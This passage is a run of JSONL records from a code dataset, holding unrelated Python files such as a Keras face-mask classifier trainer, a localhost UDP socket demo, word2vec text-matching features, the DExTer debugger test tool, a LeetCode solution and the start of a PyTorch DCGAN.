i+=1\n rankIter+=1\n\nif not guessedCorrectlyRankOne:\n print('\\n\\nIncorrect\\n\\n')\n pred = np.append(pred,0)\n\n# Show all of the predictions\nfor guessedNames in incorrectList:\n print(guessedNames)\n\nif visualizeResult:\n print('\\n\\n\\n')\n print(rankStr)\n print(' ',imagePath0)\n print('\\n\\n\\n')\n correctCount = np.where(pred==1)[0].shape[0] \n wrongCount = np.where(pred==0)[0].shape[0] \n print('Correct: ', correctCount, ' Incorrect count: ',wrongCount)\n\n print('---------------------------------------------------')\n\n# Then we show the results\n#print(predictList)\n\naccuracy = np.where(pred==1)[0].shape[0]/pred.shape[0]\nprint('Accuracy: ', accuracy)\n\n","sub_path":"predictAll.py","file_name":"predictAll.py","file_ext":"py","file_size_in_byte":24621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"250345706","text":"import tensorflow as tf\r\nimport cv2\r\nimport random\r\nimport image_utils\r\nimport numpy as np\r\nfrom os import path, mkdir, listdir\r\nfrom keras.preprocessing.image import ImageDataGenerator\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Conv2D, MaxPooling2D\r\nfrom keras.layers import Activation, Dropout, Flatten, Dense\r\n\r\n#loading images of mask/unmasked dataset with validation images\r\nclass MaskTrainNN:\r\n def load_training_set2(self):\r\n train_datagen = ImageDataGenerator(\r\n rotation_range=40,\r\n width_shift_range=0.2,\r\n height_shift_range=0.2,\r\n rescale=1./255,\r\n shear_range=0.2,\r\n zoom_range=0.2,\r\n horizontal_flip=True,\r\n fill_mode='nearest')\r\n\r\n test_datagen = ImageDataGenerator(rescale=1./255)\r\n\r\n #training set\r\n train_generator = train_datagen.flow_from_directory(\r\n 'temp_data/train', \r\n target_size=(200, 200), \r\n batch_size=4,\r\n class_mode='binary') \r\n\r\n #validation set\r\n validation_generator = test_datagen.flow_from_directory(\r\n 'temp_data/validation',\r\n target_size=(200, 200),\r\n batch_size=4,\r\n class_mode='binary')\r\n\r\n return train_generator, validation_generator\r\n\r\n\r\n def load_training_set(self):\r\n print(\"Loading Training Set\")\r\n mask_data_dir = \"mask_data\"\r\n masked_folder = \"masked\"\r\n unmasked_folder = \"unmasked\"\r\n\r\n #finding mask dataset directories\r\n mask_dirs = listdir(mask_data_dir + \"/\" + masked_folder)\r\n unmask_dirs = listdir(mask_data_dir + \"/\" + unmasked_folder)\r\n images = []\r\n ids = []\r\n masked_found = 0\r\n unmasked_found = 0\r\n\r\n #iterate the masked data set\r\n for u in mask_dirs:\r\n user_files = listdir(mask_data_dir + \"/\" + masked_folder + \"/\" + u) \r\n for f in user_files: \r\n #print(mask_data_dir + \"/\" + masked_folder + \"/\" + u + \"/\" + f)\r\n if('┼' in f):\r\n continue\r\n image = cv2.imread(mask_data_dir + \"/\" + masked_folder + \"/\" + u + \"/\" + f)\r\n image_color, _ = image_utils.crop_colour(image)\r\n if(not image_color.size == 0):\r\n ids.append([1, 0])\r\n images.append(image_color)\r\n masked_found += 1\r\n print(\"Masked: \" + str(masked_found))\r\n\r\n #iterate the unmasked data set\r\n for u in unmask_dirs: \r\n #print(mask_data_dir + \"/\" + unmasked_folder + \"/\" + u)\r\n user_files = listdir(mask_data_dir + \"/\" + unmasked_folder + \"/\" + u)\r\n for f in user_files:\r\n #print(mask_data_dir + \"/\" + unmasked_folder + \"/\" + u + \"/\" + f)\r\n image = cv2.imread(mask_data_dir + \"/\" + unmasked_folder + \"/\" + u + \"/\" + f)\r\n image_color, _ = image_utils.crop_colour(image)\r\n if(not image_color.size == 0):\r\n ids.append([0, 1])\r\n images.append(image_color)\r\n unmasked_found += 1\r\n print(\"Unmasked: \" + str(unmasked_found))\r\n\r\n print(\"Total Masked: \" + str(masked_found))\r\n print(\"Total Unmasked: \" + str(unmasked_found))\r\n np_im = np.array(images, dtype=np.float32)\r\n np_id = np.array(ids, dtype=np.float32)\r\n return np_im.astype(np.float32), np_id.astype(np.float32)\r\n\r\n #keras used for model\r\n def build_model(self):\r\n model = tf.keras.models.Sequential([\r\n tf.keras.layers.Conv2D(100, (3,3), activation='relu', input_shape=(200, 200, 3)),\r\n tf.keras.layers.MaxPooling2D(2,2),\r\n \r\n tf.keras.layers.Conv2D(100, (3,3), activation='relu'),\r\n tf.keras.layers.MaxPooling2D(2,2),\r\n \r\n tf.keras.layers.Flatten(),\r\n tf.keras.layers.Dropout(0.5),\r\n tf.keras.layers.Dense(50, activation='relu'),\r\n tf.keras.layers.Dense(1, activation='sigmoid')\r\n ])\r\n model.compile(loss='binary_crossentropy', optimizer='rmsprop', metrics=['accuracy'])\r\n return model\r\n\r\n #run training for mask/unmask detection\r\n def run_training2(self):\r\n model = self.build_model()\r\n train_generator, validation_generator = self.load_training_set2()\r\n model.fit_generator(\r\n train_generator,\r\n epochs=50,\r\n validation_data=validation_generator)\r\n\r\n # serialize model to JSON\r\n model_json = model.to_json()\r\n with open(\"model.json\", \"w\") as json_file:\r\n json_file.write(model_json)\r\n # serialize weights to HDF5\r\n model.save_weights(\"model.h5\")\r\n print(\"Saved weights to disk\")\r\n #model.save(\"mask_model\")\r\n print(\"Done\")\r\n\r\n def run_training(self):\r\n model = self.build_model()\r\n x_train, y_train = self.load_training_set()\r\n print(\"Start Fitting\")\r\n history = model.fit(x_train, y_train, batch_size=64, epochs=1)\r\n\r\n # serialize model to JSON\r\n model_json = model.to_json()\r\n with open(\"model.json\", \"w\") as json_file:\r\n json_file.write(model_json)\r\n # serialize weights to HDF5\r\n model.save_weights(\"model.h5\")\r\n print(\"Saved model to disk\")\r\n\r\n scores = model.evaluate(x_train, y_train, verbose=0)\r\n print(\"%s: %.2f%%\" % (model.metrics_names[1], scores[1]*100))\r\n #model.save(\"mask_model\")\r\n print(\"Done\")\r\n \r\n \r\n#----- OLD METHOD OF TRAINING --- NOT USED DUE TO .YML TOO BIG (11gb+ with supplied dataset)-----\r\n#https://github.com/X-zhangyang/Real-World-Masked-Face-Dataset - masked dataset source - NOT USED\r\nclass MaskTrain:\r\n def run_training(self):\r\n mask_data_dir = \"mask_data\"\r\n masked_folder = \"masked\"\r\n unmasked_folder = \"unmasked\"\r\n\r\n #finding mask dataset directories\r\n mask_dirs = listdir(mask_data_dir + \"/\" + masked_folder)\r\n unmask_dirs = listdir(mask_data_dir + \"/\" + unmasked_folder)\r\n images = []\r\n ids = []\r\n\r\n #iterate the masked data set\r\n for u in mask_dirs:\r\n user_files = listdir(mask_data_dir + \"/\" + masked_folder + \"/\" + u)\r\n for f in user_files:\r\n print(mask_data_dir + \"/\" + masked_folder + \"/\" + u + \"/\" + f)\r\n if('┼' in f):\r\n continue\r\n image = cv2.imread(mask_data_dir + \"/\" + masked_folder + \"/\" + u + \"/\" + f)\r\n image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\r\n ids.append(1)\r\n images.append(image)\r\n\r\n #iterate the unmasked data set\r\n for u in unmask_dirs:\r\n print(mask_data_dir + \"/\" + unmasked_folder + \"/\" + u)\r\n user_files = listdir(mask_data_dir + \"/\" + unmasked_folder + \"/\" + u)\r\n for f in user_files:\r\n print(mask_data_dir + \"/\" + unmasked_folder + \"/\" + u + \"/\" + f)\r\n image = cv2.imread(mask_data_dir + \"/\" + unmasked_folder + \"/\" + u + \"/\" + f)\r\n image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\r\n ids.append(0)\r\n images.append(image)\r\n\r\n recogniser = cv2.face.LBPHFaceRecognizer_create()\r\n recogniser.train(images, np.array(ids))\r\n recogniser.write(\"mask_train.yml\")\r\n\r\nr = MaskTrainNN()\r\nr.run_training2()\r\n#r = MaskTrain()\r\n#r.run_training()\r\n\r\n\r\n","sub_path":"AttendanceMonitor/mask_train.py","file_name":"mask_train.py","file_ext":"py","file_size_in_byte":7570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"71738762","text":"# encoding:utf-8\r\nimport socket\r\n\r\ns = socket.socket(socket.AF_INET,socket.SOCK_DGRAM,socket.IPPROTO_UDP)\r\n\r\n# 绑定udp服务端\r\ns.bind( ('127.0.0.1', 3456) )\r\n\r\ndata = s.recvfrom(100 )\r\ns.sendto('数据', ('127.0.0.1' , 6789))\r\n\r\n\r\n","sub_path":"py003/py003_udp_server.py","file_name":"py003_udp_server.py","file_ext":"py","file_size_in_byte":236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"473101313","text":"# filepath_en_train = \"E:\\\\CIKM2018\\\\cikm_english_train_20180516\\\\cikm_english_train_20180516.txt\"\n# filepath_sp_train = \"E:\\\\CIKM2018\\\\cikm_spanish_train_20180516.txt\"\n# filepath_test = \"E:\\\\CIKM2018\\\\cikm_test_a_20180516.txt\"\n# filepath_unlabel = \"E:\\\\CIKM2018\\\\cikm_unlabel_spanish_train_20180516\\\\cikm_unlabel_spanish_train_20180516.txt\"\n# w2v_pah = \"E:\\\\CIKM2018\\\\w2v.model.bin\"\n# fast_path = \"E:\\\\CIKM2018\\\\fast_text_vectors_wiki.es.vec\\\\wiki.es.vec\"\n# file_stop_word = \"E:\\\\CIKM2018\\\\spanish_stop_word.txt\"\nfilepath_en_train = \"I:\\\\CIKM\\\\cikm_english_train_20180516\\\\cikm_english_train_20180516.txt\"\nfilepath_sp_train = \"I:\\\\CIKM\\\\cikm_spanish_train_20180516.txt\"\nfilepath_test = \"I:\\\\CIKM\\\\cikm_test_a_20180516.txt\"\nfilepath_unlabel = \"I:\\\\CIKM\\\\cikm_unlabel_spanish_train_20180516\\\\cikm_unlabel_spanish_train_20180516.txt\"\nw2v_pah = \"I:\\\\CIKM\\\\w2v.model.bin\"\nfast_path = \"I:\\\\CIKM\\\\fast_text_vectors_wiki.en.vec\\\\wiki.en.vec\"\nfile_stop_word = \"I:\\\\CIKM\\\\spanish_stop_word.txt\"\nfrom text_match.en.data_utils import datahelper\nimport pandas as pd\nimport numpy as np\nfrom gensim.models.tfidfmodel import TfidfModel\nfrom gensim.similarities import MatrixSimilarity\nfrom scipy import spatial\nimport datetime\nfrom scipy.stats import skew, kurtosis\nfrom gensim.corpora.dictionary import Dictionary\n\nx_train1, x_train2, _ = datahelper.load_data(filepath_en_train, filepath_sp_train)\ntrain = pd.DataFrame()\n\ntrain['question1'] = x_train1\ntrain['question2'] = x_train2\n\n# clean\ntfidf_txt = train['question1'].tolist() + train['question2'].tolist()\ntrain_qs = pd.Series(tfidf_txt).astype(str)\ndictionary = Dictionary(x.split(\" \") for x in tfidf_txt)\n\n\nclass MyCorpus(object):\n def __iter__(self):\n for x in tfidf_txt:\n yield dictionary.doc2bow(x.split(\" \"))\n\n\ncorpus = MyCorpus()\ntfidf = TfidfModel(corpus)\n\n\ndef getdiffwords(q1, q2):\n word1 = q1.split()\n word2 = q2.split()\n qdf1 = [w for w in word1 if w not in word2]\n tmp = \" \".join(qdf1)\n return tmp\n\n\ndef to_tfidf(text):\n res = tfidf[dictionary.doc2bow(text.split(\" \"))]\n return res\n\n\ndef tfidf_w(token):\n weights = dictionary.token2id\n if token in weights:\n res = tfidf.idfs[weights[token]]\n else:\n res = 1.0\n return res\n\n\ndef eucldist_vectorized(word_1, word_2):\n try:\n w2v1 = model[word_1]\n w2v2 = model[word_2]\n sim = np.sqrt(np.sum((np.array(w2v1) - np.array(w2v2)) ** 2))\n return float(sim)\n except:\n return float(0)\n\n\n# 输入两个wordlist\n# 默认句子中每个词权重相同,实际可以更改\ndef getDiff(wordlist_1, wordlist_2):\n wordlist_1 = wordlist_1.split()\n wordlist_2 = wordlist_2.split()\n num = len(wordlist_1) + 0.001\n sim = 0.0\n for word_1 in wordlist_1:\n dis = 0.0\n for word_2 in wordlist_2:\n if (dis == 0.0):\n dis = eucldist_vectorized(word_1, word_2)\n else:\n dis = min(dis, eucldist_vectorized(word_1, word_2))\n sim += dis\n return (sim / num)\n\n\ndef getDiff_weight(wordlist_1, wordlist_2):\n wordlist_1 = wordlist_1.split()\n wordlist_2 = wordlist_2.split()\n tot_weights = 0.0\n for word_1 in wordlist_1:\n tot_weights += tfidf_w(word_1)\n sim = 0.0\n for word_1 in wordlist_1:\n dis = 0.0\n for word_2 in wordlist_2:\n if (dis == 0.0):\n dis = eucldist_vectorized(word_1, word_2)\n else:\n dis = min(dis, eucldist_vectorized(word_1, word_2))\n sim += tfidf_w(word_1) * dis\n return sim\n\n\ndef getDiff_averge(wordlist_1, wordlist_2):\n return getDiff_weight(wordlist_1, wordlist_2) + getDiff_weight(wordlist_2, wordlist_1)\n\n\ndef cos_sim(text1, text2):\n tfidf1 = to_tfidf(text1)\n tfidf2 = to_tfidf(text2)\n index = MatrixSimilarity([tfidf1], num_features=len(dictionary))\n sim = index[tfidf2]\n return float(sim[0])\n\n\ndef get_vector(text):\n # 建立一个全是0的array\n res = np.zeros([300])\n count = 0\n for word in text.split(\" \"):\n if word in vocab:\n res += tfidf_w(word) * model[word]\n count += tfidf_w(word)\n if count != 0:\n return res / count\n return np.zeros([300])\n\n\ndef get_weight_vector(text):\n # 建立一个全是0的array\n res = np.zeros([300])\n count = 0\n for word in text.split(\" \"):\n if word in vocab:\n res += model[word]\n count += 1\n if count != 0:\n return res / count\n return np.zeros([300])\n\n\ndef w2v_cos_sim(text1, text2):\n try:\n w2v1 = get_weight_vector(text1)\n w2v2 = get_weight_vector(text2)\n sim = 1 - spatial.distance.cosine(w2v1, w2v2)\n return float(sim)\n except:\n return float(0)\n\n\ndef get_features(df_features):\n print('use w2v to document presentation')\n now = datetime.datetime.now()\n now.strftime('%Y-%m-%d %H:%M:%S')\n print('get_w2v')\n now = datetime.datetime.now()\n now.strftime('%Y-%m-%d %H:%M:%S')\n df_features['q1_unique'] = df_features.apply(lambda x: getdiffwords(x['question1'], x['question2']), axis=1)\n df_features['q2_unique'] = df_features.apply(lambda x: getdiffwords(x['question2'], x['question1']), axis=1)\n\n df_features['q1_unique_w2v_weight'] = df_features.q1_unique.map(lambda x: get_vector(x))\n df_features['q2_unique_w2v_weight'] = df_features.q2_unique.map(lambda x: get_vector(x))\n df_features['q1_unique_w2v'] = df_features.q1_unique.map(lambda x: get_weight_vector(x))\n df_features['q2_unique_w2v'] = df_features.q2_unique.map(lambda x: get_weight_vector(x))\n\n print('z_dist')\n now = datetime.datetime.now()\n now.strftime('%Y-%m-%d %H:%M:%S')\n now = datetime.datetime.now()\n print('z_tfidf_cos_sim')\n now.strftime('%Y-%m-%d %H:%M:%S')\n now = datetime.datetime.now()\n now.strftime('%Y-%m-%d %H:%M:%S')\n\n df_features['z_w2v_unique_dis_e_weight'] = df_features.apply(\n lambda x: spatial.distance.euclidean(x['q1_unique_w2v_weight'], x['q2_unique_w2v_weight']), axis=1)\n df_features['z_w2v_unique_dis_e'] = df_features.apply(\n lambda x: spatial.distance.euclidean(x['q1_unique_w2v'], x['q2_unique_w2v']), axis=1)\n\n df_features['z_w2v_unique_dis_mink_w'] = df_features.apply(\n lambda x: spatial.distance.minkowski(x['q1_unique_w2v_weight'], x['q2_unique_w2v_weight'], 3), axis=1)\n df_features['z_w2v_unique_dis_cityblock_w'] = df_features.apply(\n lambda x: spatial.distance.cityblock(x['q1_unique_w2v_weight'], x['q2_unique_w2v_weight']), axis=1)\n df_features['z_w2v_unique_dis_canberra_w'] = df_features.apply(\n lambda x: spatial.distance.canberra(x['q1_unique_w2v_weight'], x['q2_unique_w2v_weight']), axis=1)\n\n df_features['z_w2v_unique_dis_mink'] = df_features.apply(\n lambda x: spatial.distance.minkowski(x['q1_unique_w2v'], x['q2_unique_w2v'], 3), axis=1)\n df_features['z_w2v_unique_dis_cityblock'] = df_features.apply(\n lambda x: spatial.distance.cityblock(x['q1_unique_w2v'], x['q2_unique_w2v']), axis=1)\n df_features['z_w2v_unique_dis_canberra'] = df_features.apply(\n lambda x: spatial.distance.canberra(x['q1_unique_w2v'], x['q2_unique_w2v']), axis=1)\n\n df_features['z_q1_unique_skew_w'] = df_features.q1_unique_w2v_weight.map(lambda x: skew(x))\n df_features['z_q2_unique_skew_w'] = df_features.q2_unique_w2v_weight.map(lambda x: skew(x))\n df_features['z_q1_unique_kur_w'] = df_features.q1_unique_w2v_weight.map(lambda x: kurtosis(x))\n df_features['z_q2_unique_kur_w'] = df_features.q2_unique_w2v_weight.map(lambda x: kurtosis(x))\n\n df_features['z_q1_unique_skew'] = df_features.q1_unique_w2v.map(lambda x: skew(x))\n df_features['z_q2_unique_skew'] = df_features.q2_unique_w2v.map(lambda x: skew(x))\n df_features['z_q1_unique_kur'] = df_features.q1_unique_w2v.map(lambda x: kurtosis(x))\n df_features['z_q2_unique_kur'] = df_features.q2_unique_w2v.map(lambda x: kurtosis(x))\n del df_features['q1_unique_w2v_weight']\n del df_features['q2_unique_w2v_weight']\n del df_features['q1_unique_w2v']\n del df_features['q2_unique_w2v']\n print('all done')\n now.strftime('%Y-%m-%d %H:%M:%S')\n df_features.fillna(0.0)\n return df_features\n\n\nfrom gensim.models import KeyedVectors\n\nif __name__ == '__main__':\n model = KeyedVectors.load_word2vec_format(fast_path)\n vocab = model.vocab\n\n train = get_features(train)\n train.to_csv('train_weight_noweight.csv', index=False)\n","sub_path":"text_match/en/features/testunique/test_unique.py","file_name":"test_unique.py","file_ext":"py","file_size_in_byte":8443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"598587364","text":"import sys\n\nn = input()\n\nfor i in sys.stdin:\n\tnum = i[0]\n\tgrades = [int(v) for v in i.split()[1:]]\n\t\n\tavg = sum(grades) / len(grades)\n\tabove = [1 if v > avg else 0 for v in grades]\n\tprint(\"{:.3f}%\".format(sum(above) / len(grades) * 100))","sub_path":"Desktop/Python/aa2.py","file_name":"aa2.py","file_ext":"py","file_size_in_byte":237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"584958351","text":"# DExTer : Debugging Experience Tester\n# ~~~~~~ ~ ~~ ~ ~~\n#\n# Copyright (c) 2018 by SN Systems Ltd., Sony Interactive Entertainment Inc.\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\"\"\"Test tool.\"\"\"\n\nimport os\nimport csv\n\nfrom dex.builder import run_external_build_script\nfrom dex.debugger.Debuggers import get_debugger_steps\nfrom dex.heuristic import Heuristic\nfrom dex.tools import TestToolBase\nfrom dex.utils.Exceptions import DebuggerException\nfrom dex.utils.Exceptions import BuildScriptException, HeuristicException\nfrom dex.utils.PrettyOutputBase import Stream\n\n\nclass TestCase(object):\n def __init__(self, context, name, heuristic, error):\n self.context = context\n self.name = name\n self.heuristic = heuristic\n self.error = error\n\n @property\n def penalty(self):\n try:\n return self.heuristic.penalty\n except AttributeError:\n return float('nan')\n\n @property\n def max_penalty(self):\n try:\n return self.heuristic.max_penalty\n except AttributeError:\n return float('nan')\n\n @property\n def score(self):\n try:\n return self.heuristic.score\n except AttributeError:\n return float('nan')\n\n def __str__(self):\n if self.error and self.context.options.verbose:\n verbose_error = str(self.error)\n else:\n verbose_error = ''\n\n if self.error:\n script_error = (' : {}'.format(\n self.error.script_error.splitlines()[0].decode()) if getattr(\n self.error, 'script_error', None) else '')\n\n error = ' [{}{}]'.format(\n str(self.error).splitlines()[0], script_error)\n else:\n error = ''\n\n try:\n summary = self.heuristic.summary_string\n except AttributeError:\n summary = 'nan/nan (nan)'\n return '{}: {}{}\\n{}'.format(self.name, summary, error, verbose_error)\n\n\nclass Tool(TestToolBase):\n \"\"\"Run the specified DExTer test(s) with the specified compiler and linker\n options and produce dextIR output as a JSON file as well as printing out\n the debugging experience score calculated by the DExTer heuristic.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super(Tool, self).__init__(*args, **kwargs)\n self._test_cases = []\n\n @property\n def name(self):\n return 'DExTer test'\n\n def _run_test(self, subdir, test_name):\n options = self.context.options\n test_name = os.path.relpath(subdir, options.tests_directory)\n if os.path.split(test_name)[-1] == '.':\n test_name = os.path.basename(subdir)\n\n compiler_options = [options.cflags for _ in options.source_files]\n linker_options = options.ldflags\n try:\n _, _, builderIR = run_external_build_script(\n self.context,\n script_path=self.build_script,\n source_files=options.source_files,\n compiler_options=compiler_options,\n linker_options=linker_options,\n executable_file=options.executable)\n except BuildScriptException as e:\n test_case = TestCase(self.context, test_name, None, e)\n self.context.o.auto(test_case)\n self._test_cases.append(test_case)\n return\n\n try:\n steps = get_debugger_steps(self.context)\n steps.builder = builderIR\n except DebuggerException as e:\n test_case = TestCase(self.context, test_name, None, e)\n self.context.o.auto(test_case)\n self._test_cases.append(test_case)\n return\n\n test_results_path = os.path.join(options.results_directory, '_'.join(\n os.path.split(test_name)))\n output_text_path = '{}.txt'.format(test_results_path)\n with open(output_text_path, 'w') as fp:\n self.context.o.auto(str(steps), stream=Stream(fp))\n\n output_json_path = '{}.json'.format(test_results_path)\n with open(output_json_path, 'w') as fp:\n fp.write(steps.as_json)\n\n try:\n heuristic = Heuristic(self.context, steps)\n except HeuristicException as e:\n test_case = TestCase(self.context, test_name, None, e)\n self.context.o.auto(test_case)\n self._test_cases.append(test_case)\n return\n\n with open(output_text_path, 'a') as fp:\n self.context.o.auto(heuristic.verbose_output, stream=Stream(fp))\n\n test_case = TestCase(self.context, test_name, heuristic, None)\n self.context.o.auto(test_case)\n self._test_cases.append(test_case)\n\n if options.verbose:\n self.context.o.auto('\\n{}\\n'.format(steps))\n self.context.o.auto(heuristic.verbose_output)\n\n def _handle_results(self):\n options = self.context.options\n\n if not options.verbose:\n self.context.o.auto('\\n')\n\n summary_path = os.path.join(options.results_directory, 'summary.csv')\n with open(summary_path, mode='w', newline='') as fp:\n writer = csv.writer(fp, delimiter=',')\n writer.writerow(['Test Case', 'Score', 'Error'])\n\n for test_case in self._test_cases:\n writer.writerow([\n test_case.name, '{:.4f}'.format(test_case.score),\n test_case.error\n ])\n\n return 0\n","sub_path":"dex/tools/test/Tool.py","file_name":"Tool.py","file_ext":"py","file_size_in_byte":6480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"58837458","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Mar 1 08:59:14 2019\n\n@author: xabuka\nusing CNN + RNN\n\"\"\"\n\nimport loading\n\nmax_features = 10000 # number of words to consider as features\nmax_len = 500\ntraining_samples = 700 # We will be training on 200 samples\nvalidation_samples = 200 # We will be validating on 10000 samples\n\nx_train, y_train, x_val,y_val = loading.load_train(max_len,training_samples,validation_samples,max_features )\nx_test, y_test = loading.load_test(max_len,max_features)\nprint('input_train shape:', x_train.shape)\nprint('input_test shape:', x_test.shape)\n\n\nfrom keras.models import Sequential\nfrom keras import layers\nfrom keras.optimizers import RMSprop\n#from keras.layers import Embedding, Conv1D,MaxPooling1D, GlobalMaxPooling1D, Dense\nmodel = Sequential()\nmodel.add(layers.Embedding(max_features, 128, input_length=max_len))\nmodel.add(layers.Conv1D(32, 7, activation='relu'))\nmodel.add(layers.MaxPooling1D(5))\nmodel.add(layers.Conv1D(32, 7, activation='relu'))\n#model.add(layers.GlobalMaxPooling1D())\nmodel.add(layers.GRU(32, dropout=0.1, recurrent_dropout=0.5))\nmodel.add(layers.Dense(3))\nmodel.summary()\nmodel.compile(optimizer=RMSprop(lr=1e-4),\n loss='categorical_crossentropy',\n metrics=['acc'])\nhistory = model.fit(x_train, y_train,\n epochs=100,\n batch_size=128,\n validation_data=(x_val, y_val))\n\n\n\n\nimport matplotlib.pyplot as plt\nacc = history.history['acc']\nval_acc = history.history['val_acc']\nloss = history.history['loss']\nval_loss = history.history['val_loss']\nepochs = range(1, len(acc) + 1)\nplt.plot(epochs, acc, 'bo', label='Training acc')\nplt.plot(epochs, val_acc, 'b', label='Validation acc')\nplt.title('Training and validation accuracy')\nplt.legend()\nplt.figure()\nplt.plot(epochs, loss, 'bo', label='Training loss')\nplt.plot(epochs, val_loss, 'b', label='Validation loss')\nplt.title('Training and validation loss')\nplt.legend()\nplt.show()\n\nscores= model.evaluate(x_test, y_test,verbose=0)\nprint(\"Accuracy: %.2f%%\" % (scores[1]*100))","sub_path":"python/list654.py","file_name":"list654.py","file_ext":"py","file_size_in_byte":2082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"444841113","text":"from django import forms\n\nfrom .models import *\n\nclass ProjectForm(forms.ModelForm):\n title = forms.CharField(\n widget=forms.TextInput(attrs={'class': 'form-control'}),\n max_length=255)\n members = forms.ModelMultipleChoiceField(queryset=User.objects.all())\n class Meta:\n model = Project\n fields = ['title']\n\n","sub_path":"teamwork/apps/projects/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"419540633","text":"\n\n__author__ = \"zcTresure\"\n\n\nclass Solution:\n def removeKdigits(self, num: str, k: int) -> str:\n numStack = []\n for digit in num:\n while k and numStack and numStack[-1] > digit:\n numStack.pop()\n k -= 1\n numStack.append(digit)\n finalStack = numStack[:-k] if k else numStack\n return \"\".join(finalStack).lstrip('0') or \"0\"\n\n\nnum = \"1432219\"\nk = 3\ntest = Solution()\nprint(test.removeKdigits(num, k))\n","sub_path":"questions/1-1000/400-499/402. 移掉K位数字.py","file_name":"402. 移掉K位数字.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"198693419","text":"# import re\n# l = ['s[1]', 's[2]', 's[11]', 's[14]']\n\n# pattern = \"[0-9]\"\n# ll = re.findall(pattern, l[0])\n\n# print(ll)\n\nd = { \"11\" : 1, \"22\" : 2, \"33\" : 3}\nprint(len(d))\nsort_keys = sorted(d.values())\ndata = {}\nprint(sort_keys)\n\ni = 0\nfor k in sort_keys:\n if k not in data.values():\n id = \"col_\" + str(i)\n data[id] = k\n i += 1\nprint(data)","sub_path":"test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"60584471","text":"import torch \nimport torch.nn as nn\nimport torch.optim as optim\nimport torchvision.datasets as dset\nimport torchvision.transforms as transforms\nimport torchvision.utils as vutils\nimport numpy as np\nimport argparse\n\ntorch.manual_seed(42)\n\n# fixed network parameters\nimage_size = 64\n\ndef weights_init(m):\n classname = m.__class__.__name__\n if classname.find('Conv') != -1:\n m.weight.data.normal_(0.0, 0.02)\n elif classname.find('BatchNorm') != -1:\n m.weight.data.normal_(1.0, 0.02)\n m.bias.data.fill_(0)\n\nclass Generator(nn.Module):\n def __init__(self, nz, ngf, nc):\n super(Generator, self).__init__()\n self.main = nn.Sequential( \n nn.ConvTranspose2d( nz, ngf * 8, 4, 1, 0, bias=False),\n nn.BatchNorm2d(ngf * 8),\n nn.ReLU(True),\n\n nn.ConvTranspose2d(ngf * 8, ngf * 4, 4, 2, 1, bias=False),\n nn.BatchNorm2d(ngf * 4),\n nn.ReLU(True),\n\n nn.ConvTranspose2d(ngf * 4, ngf * 2, 4, 2, 1, bias=False),\n nn.BatchNorm2d(ngf * 2),\n nn.ReLU(True),\n\n nn.ConvTranspose2d(ngf * 2, ngf, 4, 2, 1, bias=False),\n nn.BatchNorm2d(ngf),\n nn.ReLU(True),\n\n nn.ConvTranspose2d( ngf, nc, 4, 2, 1, bias=False),\n nn.Tanh()\n # state size. (nc) x 64 x 64\n )\n\n def forward(self, inp):\n return self.main(inp)\n\nclass Discriminator(nn.Module):\n def __init__(self, nc, ndf):\n super(Discriminator, self).__init__()\n self.discriminator = nn.Sequential(\n nn.Conv2d(nc, ndf, 4, 2, 1, bias=False),\n nn.LeakyReLU(0.2, inplace=True),\n \n nn.Conv2d(ndf, ndf * 2, 4, 2, 1, bias=False),\n nn.BatchNorm2d(ndf * 2),\n nn.LeakyReLU(0.2, inplace=True),\n \n nn.Conv2d(ndf * 2, ndf * 4, 4, 2, 1, bias=False),\n nn.BatchNorm2d(ndf * 4),\n nn.LeakyReLU(0.2, inplace=True),\n \n nn.Conv2d(ndf * 4, ndf * 8, 4, 2, 1, bias=False),\n nn.BatchNorm2d(ndf * 8),\n nn.LeakyReLU(0.2, inplace=True),\n \n nn.Conv2d(ndf * 8, 1, 4, 1, 0, bias=False),\n nn.Sigmoid()\n )\n\n def forward(self, inp):\n out = self.discriminator(inp)\n out = out.view(1, -1)\n return out.squeeze(1)\n\ndef main(opt, dataloader):\n netG = Generator(opt.nz, opt.ngf, opt.nc)\n netG.apply(weights_init)\n \n netD = Discriminator(opt.nc, opt.ndf)\n netD.apply(weights_init)\n\n loss = nn.BCELoss()\n\n 